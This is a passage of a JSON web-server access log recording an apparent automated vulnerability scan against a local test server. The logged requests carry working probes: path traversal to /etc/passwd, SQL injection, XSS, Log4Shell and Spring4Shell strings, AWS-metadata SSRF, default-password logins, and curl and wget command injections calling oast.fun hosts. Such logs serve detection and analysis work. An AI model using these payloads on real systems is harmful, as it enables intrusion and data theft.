"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c9v8h88smpv8c1ig07h0yzf6oxxjmzxio.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://c9v8h88smpv8c1ig07h0oycmi6sfn6z9k.oast.fun&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"8.098","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://c9v8h88smpv8c1ig07h0x89jpeg634y3z.oast.fun\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"sidefunc=update&syear=111'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Side.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://c9v8h88smpv8c1ig07h07b1oy5exfjh9p.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.c9v8h8gsmpv8c1qg07h0yh7twh388gqfe.oast.fun}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v0.1/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/297MTqZSZhe8xSRReVXTsdZHXzK@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:52 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:53 +0000","request_body":"&uid=10; wget http://c9v8h88smpv8c1ig07h0uqgqz74sukzm8.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /system/sharedir.php 